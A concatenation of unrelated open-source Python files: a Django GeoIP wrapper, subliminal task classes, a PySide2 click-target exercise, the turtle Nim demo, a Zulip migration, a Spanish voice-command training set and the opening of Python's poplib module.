# GEOIP_STANDARD - read database from filesystem, uses least memory. # # GEOIP_MEMORY_CACHE - load database into memory, faster performance # but uses more memory # # GEOIP_CHECK_CACHE - check for updated database. If database has been updated, # reload filehandle and/or memory cache. # # GEOIP_INDEX_CACHE - just cache # the most frequently accessed index portion of the database, resulting # in faster lookups than GEOIP_STANDARD, but less memory usage than # GEOIP_MEMORY_CACHE - useful for larger databases such as # GeoIP Organization and GeoIP City. Note, for GeoIP Country, Region # and Netspeed databases, GEOIP_INDEX_CACHE is equivalent to GEOIP_MEMORY_CACHE # GEOIP_STANDARD = 0 GEOIP_MEMORY_CACHE = 1 GEOIP_CHECK_CACHE = 2 GEOIP_INDEX_CACHE = 4 cache_options = dict((opt, None) for opt in (0, 1, 2, 4)) def __init__(self, path=None, cache=0, country=None, city=None): """ Initializes the GeoIP object, no parameters are required to use default settings. Keyword arguments may be passed in to customize the locations of the GeoIP data sets. * path: Base directory to where GeoIP data is located or the full path to where the city or country data files (*.dat) are located. Assumes that both the city and country data sets are located in this directory; overrides the GEOIP_PATH settings attribute. * cache: The cache settings when opening up the GeoIP datasets, and may be an integer in (0, 1, 2, 4) corresponding to the GEOIP_STANDARD, GEOIP_MEMORY_CACHE, GEOIP_CHECK_CACHE, and GEOIP_INDEX_CACHE `GeoIPOptions` C API settings, respectively. Defaults to 0, meaning that the data is read from the disk. * country: The name of the GeoIP country data file. Defaults to 'GeoIP.dat'; overrides the GEOIP_COUNTRY settings attribute. * city: The name of the GeoIP city data file. Defaults to 'GeoLiteCity.dat'; overrides the GEOIP_CITY settings attribute. """ # Checking the given cache option. 
if cache in self.cache_options: self._cache = self.cache_options[cache] else: raise GeoIPException('Invalid caching option: %s' % cache) # Getting the GeoIP data path. if not path: path = GEOIP_SETTINGS.get('GEOIP_PATH', None) if not path: raise GeoIPException('GeoIP path must be provided via parameter or the GEOIP_PATH setting.') if not isinstance(path, basestring): raise TypeError('Invalid path type: %s' % type(path).__name__) cntry_ptr, city_ptr = (None, None) if os.path.isdir(path): # Getting the country and city files using the settings # dictionary. If no settings are provided, default names # are assigned. country = os.path.join(path, country or GEOIP_SETTINGS.get('GEOIP_COUNTRY', 'GeoIP.dat')) city = os.path.join(path, city or GEOIP_SETTINGS.get('GEOIP_CITY', 'GeoLiteCity.dat')) elif os.path.isfile(path): # Otherwise, some detective work will be needed to figure # out whether the given database path is for the GeoIP country # or city databases. ptr = geoip_open(path, cache) info = geoip_dbinfo(ptr) if lite_regex.match(info): # GeoLite City database. city, city_ptr = path, ptr elif free_regex.match(info): # GeoIP Country database. country, cntry_ptr = path, ptr else: raise GeoIPException('Unable to recognize database edition: %s' % info) else: raise GeoIPException('GeoIP path must be a valid file or directory.') # `_init_db` does the dirty work. self._init_db(country, cache, '_country', cntry_ptr) self._init_db(city, cache, '_city', city_ptr) def _init_db(self, db_file, cache, attname, ptr=None): "Helper routine for setting GeoIP ctypes database properties." if ptr: # Pointer already retrieved. pass elif os.path.isfile(db_file or ''): ptr = geoip_open(db_file, cache) setattr(self, attname, ptr) setattr(self, '%s_file' % attname, db_file) def _check_query(self, query, country=False, city=False, city_or_country=False): "Helper routine for checking the query and database availability." # Making sure a string was passed in for the query. 
if not isinstance(query, basestring): raise TypeError('GeoIP query must be a string, not type %s' % type(query).__name__) # Extra checks for the existence of country and city databases. if city_or_country and self._country is None and self._city is None: raise GeoIPException('Invalid GeoIP country and city data files.') elif country and self._country is None: raise GeoIPException('Invalid GeoIP country data file: %s' % self._country_file) elif city and self._city is None: raise GeoIPException('Invalid GeoIP city data file: %s' % self._city_file) def city(self, query): """ Returns a dictionary of city information for the given IP address or Fully Qualified Domain Name (FQDN). Some information in the dictionary may be undefined (None). """ self._check_query(query, city=True) if ipregex.match(query): # If an IP address was passed in ptr = rec_by_addr(self._city, c_char_p(query)) else: # If a FQDN was passed in. ptr = rec_by_name(self._city, c_char_p(query)) # Checking the pointer to the C structure, if valid pull out elements # into a dicionary and return. if bool(ptr): record = ptr.contents return dict((tup[0], getattr(record, tup[0])) for tup in record._fields_) else: return None def country_code(self, query): "Returns the country code for the given IP Address or FQDN." self._check_query(query, city_or_country=True) if self._country: if ipregex.match(query): return cntry_code_by_addr(self._country, query) else: return cntry_code_by_name(self._country, query) else: return self.city(query)['country_code'] def country_name(self, query): "Returns the country name for the given IP Address or FQDN." 
self._check_query(query, city_or_country=True) if self._country: if ipregex.match(query): return cntry_name_by_addr(self._country, query) else: return cntry_name_by_name(self._country, query) else: return self.city(query)['country_name'] def country(self, query): """ Returns a dictonary with with the country code and name when given an IP address or a Fully Qualified Domain Name (FQDN). For example, both '24.124.1.80' and 'djangoproject.com' are valid parameters. """ # Returning the country code and name return {'country_code' : self.country_code(query), 'country_name' : self.country_name(query), } #### Coordinate retrieval routines #### def coords(self, query, ordering=('longitude', 'latitude')): cdict = self.city(query) if cdict is None: return None else: return tuple(cdict[o] for o in ordering) def lon_lat(self, query): "Returns a tuple of the (longitude, latitude) for the given query." return self.coords(query) def lat_lon(self, query): "Returns a tuple of the (latitude, longitude) for the given query." return self.coords(query, ('latitude', 'longitude')) def geos(self, query): "Returns a GEOS Point object for the given query." ll = self.lon_lat(query) if ll: from django.contrib.gis.geos import Point return Point(ll, srid=4326) else: return None #### GeoIP Database Information Routines #### def country_info(self): "Returns information about the GeoIP country database." if self._country is None: ci = 'No GeoIP Country data in "%s"' % self._country_file else: ci = geoip_dbinfo(self._country) return ci country_info = property(country_info) def city_info(self): "Retuns information about the GeoIP city database." if self._city is None: ci = 'No GeoIP City data in "%s"' % self._city_file else: ci = geoip_dbinfo(self._city) return ci city_info = property(city_info) def info(self): "Returns information about all GeoIP databases in use." 
return 'Country:\n\t%s\nCity:\n\t%s' % (self.country_info, self.city_info) info = property(info) #### Methods for compatibility w/the GeoIP-Python API. #### @classmethod def open(cls, full_path, cache): return GeoIP(full_path, cache) def _rec_by_arg(self, arg): if self._city: return self.city(arg) else: return self.country(arg) region_by_addr = city region_by_name = city record_by_addr = _rec_by_arg record_by_name = _rec_by_arg country_code_by_addr = country_code country_code_by_name = country_code country_name_by_addr = country_name country_name_by_name = country_name
drglove/SickRage
refs/heads/master
lib/subliminal/tasks.py
170
# -*- coding: utf-8 -*- # Copyright 2011-2012 Antoine Bertin <diaoulael@gmail.com> # # This file is part of subliminal. # # subliminal is free software; you can redistribute it and/or modify it under # the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # subliminal is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with subliminal. If not, see <http://www.gnu.org/licenses/>. __all__ = ['Task', 'ListTask', 'DownloadTask', 'StopTask'] class Task(object): """Base class for tasks to use in subliminal""" pass class ListTask(Task): """List task used by the worker to search for subtitles :param video: video to search subtitles for :type video: :class:`~subliminal.videos.Video` :param list languages: languages to search for :param string service: name of the service to use :param config: configuration for the service :type config: :class:`~subliminal.services.ServiceConfig` """ def __init__(self, video, languages, service, config): super(ListTask, self).__init__() self.video = video self.service = service self.languages = languages self.config = config def __repr__(self): return 'ListTask(%r, %r, %s, %r)' % (self.video, self.languages, self.service, self.config) class DownloadTask(Task): """Download task used by the worker to download subtitles :param video: video to download subtitles for :type video: :class:`~subliminal.videos.Video` :param subtitles: subtitles to download in order of preference :type subtitles: list of :class:`~subliminal.subtitles.Subtitle` """ def __init__(self, video, subtitles): super(DownloadTask, self).__init__() self.video = video self.subtitles = subtitles def 
__repr__(self): return 'DownloadTask(%r, %r)' % (self.video, self.subtitles) class StopTask(Task): """Stop task that will stop the worker""" pass
captain-proton/aise
refs/heads/master
hci/exercise_8/src/main/python/main.py
1
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys import random import math import csv from PySide2.QtCore import Qt, Slot, Signal, QObject, QPoint from PySide2.QtGui import QPainter, QBrush, QPen, QColor, QMouseEvent from PySide2.QtWidgets import\ (QAction, QApplication, QMainWindow, QStatusBar, QVBoxLayout, QWidget) from fbs_runtime.application_context.PySide2 import ApplicationContext from datetime import datetime, timedelta from dataclasses import dataclass WINDOW_BG_COLOR = 'rgb(227,242,253)' DRAW_AREA_BG_COLOR = 'rgb(187,222,251)' DRAW_AREA_BORDER_COLOR = 'rgb(130,177,255)' CIRCLE_BORDER_COLOR = QColor.fromRgb(230, 81, 0) CIRCLE_COLOR = QColor.fromRgb(255, 183, 77) CIRCLE_RADII = [10, 30, 50] TRIALS = 90 MIN_CIRCLE_DISTANCE = 30 def calculate_distance(x1: int, y1: int, x2: int, y2: int): a = math.pow(x1 - x2, 2) b = math.pow(y1 - y2, 2) distance = math.sqrt(a + b) return distance @dataclass class Circle(): radius: int circle_pos: QPoint click_pos: QPoint click_time: datetime class Comm(QObject): circle_clicked = Signal(Circle) class CircleDrawer(QWidget): def __init__(self, radius: int): QWidget.__init__(self) self.comm = Comm() self.radius = radius def paintEvent(self, paintEvent): if not hasattr(self, 'circle_pos'): x = random.randint(0, self.width() - self.radius * 2) y = random.randint(0, self.height() - self.radius * 2) self._circle_pos = QPoint(x, y) pen = QPen(CIRCLE_BORDER_COLOR) brush = QBrush(CIRCLE_COLOR, Qt.SolidPattern) painter = QPainter(self) painter.setPen(pen) painter.setBrush(brush) painter.setRenderHint(QPainter.Antialiasing) painter.drawEllipse(self.circle_pos.x(), self.circle_pos.y(), self.radius * 2, self.radius * 2) def mouseReleaseEvent(self, event: QMouseEvent): event_x = event.pos().x() event_y = event.pos().y() distance = calculate_distance(self.circle_pos.x() + self.radius, self.circle_pos.y() + self.radius, event_x, event_y) if distance <= self.radius: circle = Circle(radius=self.radius, circle_pos=self.circle_pos, 
click_pos=QPoint(event_x, event_y), click_time=datetime.now()) self.comm.circle_clicked.emit(circle) @property def circle_pos(self): if hasattr(self, '_circle_pos'): return self._circle_pos return None @circle_pos.setter def circle_pos(self, position: QPoint): if not isinstance(position, QPoint): return self._circle_pos = position @property def circle_center_x(self): return self._circle_pos.x() + self.radius @property def circle_center_y(self): return self._circle_pos.y() + self.radius class CircleContainer(QWidget): def __init__(self): QWidget.__init__(self) self.comm = Comm() self.clicked_circles = [] self.finished = False self.circle_queue = CIRCLE_RADII * int(TRIALS / len(CIRCLE_RADII)) random.shuffle(self.circle_queue) # outer widget that draws the border self.container = QWidget() style = (f'background-color: {DRAW_AREA_BG_COLOR};' f'border: 1px solid {DRAW_AREA_BORDER_COLOR};') self.container.setStyleSheet(style) self.container_layout = QVBoxLayout() self.container_layout.setContentsMargins(0, 0, 0, 0) # inner widget that draws the circles. 
can't use a combination # at this point as the border is removed if paintEvent is # overidden radius = self.get_new_radius() x, y = self.calculate_new_draw_position(radius) self.draw_circle(radius, x, y) self.container.setLayout(self.container_layout) # set layout of this widget (container -> drawer) self.layout = QVBoxLayout() self.layout.setContentsMargins(0, 0, 0, 0) self.layout.addWidget(self.container) self.setLayout(self.layout) @Slot(Circle) def on_circle_clicked(self, circle: Circle): self.clicked_circles.append(circle) self.container_layout.removeWidget(self.draw_area) self.draw_area.close() if len(self.circle_queue) > 0: radius = self.get_new_radius() x, y = self.calculate_new_draw_position(radius) self.draw_circle(radius, x, y) else: self.finished = True self.comm.circle_clicked.emit(circle) def calculate_new_draw_position(self, radius: int): max_x = self.container.width() - radius * 2 max_y = self.container.height() - radius * 2 x, y = (random.randint(0, max_x), random.randint(0, max_y)) distance = math.inf if hasattr(self, 'draw_area'): circle_center_x = self.draw_area.circle_center_x circle_center_y = self.draw_area.circle_center_y distance = calculate_distance(circle_center_x, circle_center_y, x, y) return (x, y)\ if distance >= MIN_CIRCLE_DISTANCE\ else self.calculate_new_draw_position() def get_new_radius(self): return self.circle_queue.pop() def draw_circle(self, radius: int, x: int, y: int): self.draw_area = CircleDrawer(radius) self.draw_area.circle_pos = QPoint(x, y) self.draw_area.comm.circle_clicked.connect(self.on_circle_clicked) self.container_layout.addWidget(self.draw_area) class MainWindow(QMainWindow): def __init__(self): QMainWindow.__init__(self) self.setWindowTitle("Exercise 8B - Verheyen") self.setStyleSheet(f'background-color: {WINDOW_BG_COLOR};') self.start_time = datetime.now() self.circle_container = CircleContainer() self.circle_container.comm.circle_clicked.connect( self.on_circle_clicked) 
self.setCentralWidget(self.circle_container) self.status = QStatusBar() self.status.showMessage("Hello HCI Exercise 8B", 3000) self.setStatusBar(self.status) def update_status(self, circle: Circle): prev_time = self.circle_container.clicked_circles[-2].click_time\ if len(self.circle_container.clicked_circles) > 1\ else self.start_time diff = circle.click_time - prev_time millis = diff.microseconds / 1000 diff_fmt = f'{diff.seconds}.{millis}' self.status.showMessage(f"Deleted circle (radius={circle.radius}," f" x={circle.circle_pos.x()}," f" y={circle.circle_pos.y()}) after {diff}", 3000) def save_clicks(self): filename = f'clicks_{datetime.now()}.csv' with open(filename, 'w') as output: writer = csv.writer(output) for circle in self.circle_container.clicked_circles: writer.writerow([circle.circle_pos.x(), circle.circle_pos.y(), circle.click_pos.x(), circle.click_pos.y(), circle.click_time, circle.radius]) @Slot(int, int) def on_circle_clicked(self, circle: Circle): self.update_status(circle) if self.circle_container.finished: self.save_clicks() if __name__ == "__main__": appctxt = ApplicationContext() window = MainWindow() window.showMaximized() exit_code = appctxt.app.exec_() sys.exit(exit_code)
lokirius/python-for-android
refs/heads/master
python3-alpha/python3-src/Lib/turtledemo/nim.py
65
""" turtle-example-suite: tdemo_nim.py Play nim against the computer. The player who takes the last stick is the winner. Implements the model-view-controller design pattern. """ import turtle import random import time SCREENWIDTH = 640 SCREENHEIGHT = 480 MINSTICKS = 7 MAXSTICKS = 31 HUNIT = SCREENHEIGHT // 12 WUNIT = SCREENWIDTH // ((MAXSTICKS // 5) * 11 + (MAXSTICKS % 5) * 2) SCOLOR = (63, 63, 31) HCOLOR = (255, 204, 204) COLOR = (204, 204, 255) def randomrow(): return random.randint(MINSTICKS, MAXSTICKS) def computerzug(state): xored = state[0] ^ state[1] ^ state[2] if xored == 0: return randommove(state) for z in range(3): s = state[z] ^ xored if s <= state[z]: move = (z, s) return move def randommove(state): m = max(state) while True: z = random.randint(0,2) if state[z] > (m > 1): break rand = random.randint(m > 1, state[z]-1) return z, rand class NimModel(object): def __init__(self, game): self.game = game def setup(self): if self.game.state not in [Nim.CREATED, Nim.OVER]: return self.sticks = [randomrow(), randomrow(), randomrow()] self.player = 0 self.winner = None self.game.view.setup() self.game.state = Nim.RUNNING def move(self, row, col): maxspalte = self.sticks[row] self.sticks[row] = col self.game.view.notify_move(row, col, maxspalte, self.player) if self.game_over(): self.game.state = Nim.OVER self.winner = self.player self.game.view.notify_over() elif self.player == 0: self.player = 1 row, col = computerzug(self.sticks) self.move(row, col) self.player = 0 def game_over(self): return self.sticks == [0, 0, 0] def notify_move(self, row, col): if self.sticks[row] <= col: return self.move(row, col) class Stick(turtle.Turtle): def __init__(self, row, col, game): turtle.Turtle.__init__(self, visible=False) self.row = row self.col = col self.game = game x, y = self.coords(row, col) self.shape("square") self.shapesize(HUNIT/10.0, WUNIT/20.0) self.speed(0) self.pu() self.goto(x,y) self.color("white") self.showturtle() def coords(self, row, col): packet, 
remainder = divmod(col, 5) x = (3 + 11 * packet + 2 * remainder) * WUNIT y = (2 + 3 * row) * HUNIT return x - SCREENWIDTH // 2 + WUNIT // 2, SCREENHEIGHT // 2 - y - HUNIT // 2 def makemove(self, x, y): if self.game.state != Nim.RUNNING: return self.game.controller.notify_move(self.row, self.col) class NimView(object): def __init__(self, game): self.game = game self.screen = game.screen self.model = game.model self.screen.colormode(255) self.screen.tracer(False) self.screen.bgcolor((240, 240, 255)) self.writer = turtle.Turtle(visible=False) self.writer.pu() self.writer.speed(0) self.sticks = {} for row in range(3): for col in range(MAXSTICKS): self.sticks[(row, col)] = Stick(row, col, game) self.display("... a moment please ...") self.screen.tracer(True) def display(self, msg1, msg2=None): self.screen.tracer(False) self.writer.clear() if msg2 is not None: self.writer.goto(0, - SCREENHEIGHT // 2 + 48) self.writer.pencolor("red") self.writer.write(msg2, align="center", font=("Courier",18,"bold")) self.writer.goto(0, - SCREENHEIGHT // 2 + 20) self.writer.pencolor("black") self.writer.write(msg1, align="center", font=("Courier",14,"bold")) self.screen.tracer(True) def setup(self): self.screen.tracer(False) for row in range(3): for col in range(self.model.sticks[row]): self.sticks[(row, col)].color(SCOLOR) for row in range(3): for col in range(self.model.sticks[row], MAXSTICKS): self.sticks[(row, col)].color("white") self.display("Your turn! Click leftmost stick to remove.") self.screen.tracer(True) def notify_move(self, row, col, maxspalte, player): if player == 0: farbe = HCOLOR for s in range(col, maxspalte): self.sticks[(row, s)].color(farbe) else: self.display(" ... thinking ... ") time.sleep(0.5) self.display(" ... thinking ... aaah ...") farbe = COLOR for s in range(maxspalte-1, col-1, -1): time.sleep(0.2) self.sticks[(row, s)].color(farbe) self.display("Your turn! 
Click leftmost stick to remove.") def notify_over(self): if self.game.model.winner == 0: msg2 = "Congrats. You're the winner!!!" else: msg2 = "Sorry, the computer is the winner." self.display("To play again press space bar. To leave press ESC.", msg2) def clear(self): if self.game.state == Nim.OVER: self.screen.clear() class NimController(object): def __init__(self, game): self.game = game self.sticks = game.view.sticks self.BUSY = False for stick in self.sticks.values(): stick.onclick(stick.makemove) self.game.screen.onkey(self.game.model.setup, "space") self.game.screen.onkey(self.game.view.clear, "Escape") self.game.view.display("Press space bar to start game") self.game.screen.listen() def notify_move(self, row, col): if self.BUSY: return self.BUSY = True self.game.model.notify_move(row, col) self.BUSY = False class Nim(object): CREATED = 0 RUNNING = 1 OVER = 2 def __init__(self, screen): self.state = Nim.CREATED self.screen = screen self.model = NimModel(self) self.view = NimView(self) self.controller = NimController(self) mainscreen = turtle.Screen() mainscreen.mode("standard") mainscreen.setup(SCREENWIDTH, SCREENHEIGHT) def main(): nim = Nim(mainscreen) return "EVENTLOOP!" if __name__ == "__main__": main() turtle.mainloop()
jackrzhang/zulip
refs/heads/master
zerver/migrations/0090_userprofile_high_contrast_mode.py
16
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-07-07 15:58 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('zerver', '0089_auto_20170710_1353'), ] operations = [ migrations.AddField( model_name='userprofile', name='high_contrast_mode', field=models.BooleanField(default=False), ), ]
larvasapiens/htm-teul
refs/heads/master
Learning/SpanishTestSet.py
1
""" Automatically generated Test Data Set """ trainingData = ( (['mover', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['mover', 'a', 'arriba'], ['mover-event', 'arriba-event']), (['mover', 'a', 'el', 'sur'], ['mover-event', 'abajo-event']), (['mover', 'parala', 'izquierda'], ['mover-event', 'izquierda-event']), (['por', 'favor', 'mover', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['por', 'favor', 'mover', 'a', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['por', 'favor', 'mover', 'a', 'el', 'sur'], ['mover-event', 'abajo-event']), (['por', 'favor', 'mover', 'hacia', 'la', 'derecha'], ['mover-event', 'derecha-event']), (['por', 'favor', 'mover', 'hacia', 'el', 'este'], ['mover-event', 'derecha-event']), (['por', 'favor', 'mover', 'hacia', 'arriba'], ['mover-event', 'arriba-event']), (['por', 'favor', 'mover', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['quiero', 'que', 'te', 'muevas', 'a', 'arriba'], ['mover-event', 'arriba-event']), (['quiero', 'que', 'te', 'muevas', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['quiero', 'que', 'te', 'muevas', 'hacia', 'abajo'], ['mover-event', 'abajo-event']), (['quiero', 'que', 'te', 'muevas', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['quiero', 'que', 'te', 'muevas', 'parael', 'norte'], ['mover-event', 'arriba-event']), (['quiero', 'que', 'te', 'muevas', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['moverse', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['moverse', 'a', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['moverse', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['moverse', 'hacia', 'la', 'derecha'], ['mover-event', 'derecha-event']), (['moverse', 'hacia', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['moverse', 'hacia', 'el', 'sur'], ['mover-event', 'abajo-event']), (['moverse', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['moverse', 'parael', 'este'], ['mover-event', 'derecha-event']), 
(['\xc2\xbf', 'podrias', 'moverlo', 'a', 'arriba', '?'], ['mover-event', 'arriba-event']), (['\xc2\xbf', 'podrias', 'moverlo', 'parala', 'derecha', '?'], ['mover-event', 'derecha-event']), (['muevete', 'paraabajo', 'por', 'favor'], ['mover-event', 'abajo-event']), (['ve', 'hacia', 'el', 'sur'], ['mover-event', 'abajo-event']), (['ve', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['ve', 'parael', 'este'], ['mover-event', 'derecha-event']), (['ve', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['dirigite', 'a', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['dirigite', 'a', 'arriba'], ['mover-event', 'arriba-event']), (['dirigite', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['dirigite', 'hacia', 'el', 'este'], ['mover-event', 'derecha-event']), (['dirigite', 'hacia', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['dirigite', 'hacia', 'el', 'norte'], ['mover-event', 'arriba-event']), (['dirigite', 'hacia', 'abajo'], ['mover-event', 'abajo-event']), (['dirigite', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['dirigite', 'parael', 'este'], ['mover-event', 'derecha-event']), (['dirigite', 'parala', 'izquierda'], ['mover-event', 'izquierda-event']), (['dirigite', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['dirigite', 'paraabajo'], ['mover-event', 'abajo-event']), (['gira', 'a', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['gira', 'hacia', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['gira', 'parael', 'oeste'], ['mover-event', 'izquierda-event']), (['gira', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['vuleve', 'a', 'abajo'], ['mover-event', 'abajo-event']), (['vuleve', 'parala', 'derecha'], ['mover-event', 'derecha-event']), (['ir', 'a', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['ir', 'a', 'el', 'sur'], ['mover-event', 'abajo-event']), (['ir', 'hacia', 'el', 'este'], ['mover-event', 'derecha-event']), (['ir', 'hacia', 'la', 'izquierda'], 
['mover-event', 'izquierda-event']), (['ir', 'hacia', 'el', 'oeste'], ['mover-event', 'izquierda-event']), (['desplazate', 'a', 'la', 'derecha'], ['mover-event', 'derecha-event']), (['desplazate', 'a', 'el', 'este'], ['mover-event', 'derecha-event']), (['desplazate', 'a', 'el', 'norte'], ['mover-event', 'arriba-event']), (['desplazate', 'hacia', 'la', 'izquierda'], ['mover-event', 'izquierda-event']), (['desplazate', 'parael', 'este'], ['mover-event', 'derecha-event']), (['desplazate', 'parael', 'norte'], ['mover-event', 'arriba-event']), (['desplazate', 'paraabajo'], ['mover-event', 'abajo-event']), (['desplazate', 'parael', 'sur'], ['mover-event', 'abajo-event']), (['\xc2\xbf', 'bailamos', '?'], ['bailar-event', 'nothing-event']), (['recoge', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['recoge', 'el', 'sombrero', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['recoge', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'recoge', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'recoge', 'lo', 'que', 'esta', 'ahi'], ['recoger-event', 'nothing-event']), (['alza', 'el', 'sombrero'], ['recoger-event', 'nothing-event']), (['alza', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['alza', 'el', 'objeto', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alza', 'el', 'sombrero'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alza', 'la', 'cachucha'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alza', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['levanta', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['levanta', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levanta', 'el', 'sombrero'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levanta', 'la', 'cachucha'], ['recoger-event', 'nothing-event']), (['por', 
'favor', 'levanta', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['ponte', 'la', 'cachucha'], ['recoger-event', 'nothing-event']), (['ponte', 'lo', 'que', 'esta', 'ahi'], ['recoger-event', 'nothing-event']), (['ponte', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'el', 'objeto'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'el', 'sombrero', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'la', 'cachucha', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'ponte', 'lo', 'que', 'esta', 'ahi', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['recogelo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'recogelo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['alzalo'], ['recoger-event', 'nothing-event']), (['alzalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'alzalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['levantalo'], ['recoger-event', 'nothing-event']), (['levantalo'], ['recoger-event', 'nothing-event']), (['levantalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levantalo'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levantalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'levantalo', 'por', 'favor'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'pontelo'], ['recoger-event', 'nothing-event']), (['por', 'favor', 'pontelo', 'por', 'favor'], ['recoger-event', 'nothing-event']), ) inputIdx = {'actionInput': 1, 'wordInput': 0} categories = [set(['el', 've', 'este', 'bailemos', 'alza', 'gira', 'por', 'recogelo', ',', 'esqueleto', 'levantalo', 'hacia', 'parala', 'mover', 'tirutiru', 'desplazate', 'levanta', 'esta', '!', 'quiero', 'pares', 'objeto', 'la', 'moverse', 'sombrero', 'danza', 'baila', 'mueve', 'derecha', 'favor', 'ese', 'arriba', 
'sur', 'tus', 'paraarriba', 'baldosa', 'te', 'no', '?', 'vamos', 'cachucha', 'podrias', 'ahi', 'parael', 'tiru', 'muevete', 'norte', 'de', 'abajo', 'bailar', 'alzalo', 'movimientos', 'samba', 'que', 'bailas', 'recoge', 'ver', 'azotar', 'oeste', 'a', 'moverlo', 'sabor', '\xc2\xa1', 'vuleve', 'bailamos', 'dirigite', 'titiru', 'lo', 'izquierda', 'pontelo', 'paraabajo', 'muevas', 'ponte', '\xc2\xbf', 'ir']), set(['derecha-event', 'mover-event', 'nothing-event', 'bailar-event', 'recoger-event', 'izquierda-event', 'arriba-event', 'abajo-event'])]
keyurpatel076/MissionPlannerGit
refs/heads/master
packages/IronPython.StdLib.2.7.4/content/Lib/poplib.py
223
"""A POP3 client class. Based on the J. Myers POP3 draft, Jan. 96 """ # Author: David Ascher <david_ascher@brown.edu> # [heavily stealing from nntplib.py] # Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97] # String method conversion and test jig improvements by ESR, February 2001. # Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003 # Example (see the test function at the end of this file) # Imports import re, socket __all__ = ["POP3","error_proto"] # Exception raised when an error or invalid response is received: class error_proto(Exception): pass # Standard Port POP3_PORT = 110 # POP SSL PORT POP3_SSL_PORT = 995 # Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF) CR = '\r' LF = '\n' CRLF = CR+LF class POP3: """This class supports both the minimal and optional command sets. Arguments can be strings or integers (where appropriate) (e.g.: retr(1) and retr('1') both work equally well. Minimal Command Set: USER name user(name) PASS string pass_(string) STAT stat() LIST [msg] list(msg = None) RETR msg retr(msg) DELE msg dele(msg) NOOP noop() RSET rset() QUIT quit() Optional Commands (some servers support these): RPOP name rpop(name) APOP name digest apop(name, digest) TOP msg n top(msg, n) UIDL [msg] uidl(msg = None) Raises one exception: 'error_proto'. Instantiate with: POP3(hostname, port=110) NB: the POP protocol locks the mailbox from user authorization until QUIT, so be sure to get in, suck the messages, and quit, each time you access the mailbox. POP is a line-based protocol, which means large mail messages consume lots of python cycles reading them line-by-line. If it's available on your mail server, use IMAP4 instead, it doesn't suffer from the two problems above. 
